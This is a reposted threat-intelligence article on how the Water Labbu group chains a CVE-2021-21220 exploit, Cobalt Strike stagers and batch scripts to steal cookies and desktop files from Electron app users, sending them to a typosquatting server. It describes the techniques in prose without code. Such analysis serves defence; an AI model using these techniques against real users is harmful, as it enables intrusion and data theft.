Arabic Arabic Chinese (Simplified) Chinese (Simplified) Dutch Dutch English English French French German German Italian Italian Portuguese Portuguese Russian Russian Spanish Spanish
| (844) 627-8267

How Water Labbu Exploits Electron-Based Applications | #firefox | #chrome | #microsoftedge | #hacking | #aihp

When the weaponized HTML pages detect a vulnerable target, it will proceed with loading additional stages of the attack.

The last stage involves the creation and loading of a new script called “tongji.js,” which in Chinese means 痛擊 (to deliver a punishing attack). These files are hosted inside Water Labbu’s code repository. The “tongji.js” script is a JavaScript containing CVE-2021-21220 exploit code, with a shellcode that is a Cobalt Strike stager. The Metasploit module for this vulnerability is publicly available. Water Labbu reuses the available code, obfuscates it with one or more layers of obfuscation (sojson.v4,, before executing the custom shellcode.

The embedded shellcode can either be a Cobalt Strike stager or a complex batch command capable of stealing credentials, and downloading and running other scripts and files.

Regardless if the embedded shellcode is the stager or the custom batch script, we noticed that the set of malicious operations that were being performed were largely the same:

1)      Download and install Cobalt Strike
2)      Steal cookies and other important files
3)      Download and patch the MeiQia app
4)      Download additional spying software
5)      Provide information about the infection progress by communicating with the report-collecting server, among others

The Cobalt Stike stager is usually encrypted (XOR, AES), encoded (Base64, hexadecimal), and embedded into a Golang shellcode runner to make payload detection more difficult. The malware operator was likely inspired by this blog post.

It attempts to steal *.txt files in “\desktop\,” “\Telegram Desktop\,” and MeiQia cookies in “\AppData\Roaming\\cookies.” These files are included in a specially crafted .html file and submitted to the information-collecting server with the help of headless Chrome (without visible UI) or Internet Explorer (if submission with Chrome fails). The specially crafted .html file contains one form, one input text with the computer name, and one text area with stolen content. After the timeout expires, the script will automatically submit the content to a typosquatting domain.

Click Here For The Original Source.


National Cyber Security